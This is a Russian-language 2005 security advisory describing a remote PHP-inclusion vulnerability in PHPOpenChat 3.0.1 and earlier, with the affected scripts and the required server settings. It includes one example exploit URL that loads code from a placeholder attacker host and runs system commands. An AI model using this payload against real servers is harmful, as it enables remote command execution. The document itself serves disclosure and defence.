PHP-инклюдинг в PHPOpenChat

Дата публикации:
18.03.2005
Всего просмотров:
2265
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHPOpenChat 3.0.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php-сценарий на уязвимой системе.

Уязвимость существует в сценарии /phpopenchat/contrib/phpbb/ alternative2/phpBB2_root/poc_loginform.php из-за некорректной обработки входных данных в переменной 'phpbb_root_path'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе с привилегиями web сервера. Пример:

http://[target]/phpopenchat/contrib/phpbb/alternative2/
phpBB2_root poc_login form.php?phpbb_root_path=
http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps

Также уязвимы сценарии /contrib/phpbb/poc.php,/contrib/phpnuke/ENGLISH_poc.php,
/contrib/phpnuke/poc.php, и /contrib/yabbse/poc.php. Для удачной эксплуатации уязвимости опции register_globals и allow_url_fopen должны быть включены на целевой системе.

URL производителя: http://phpopenchat.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in PHPOpenChat

или введите имя

CAPTCHA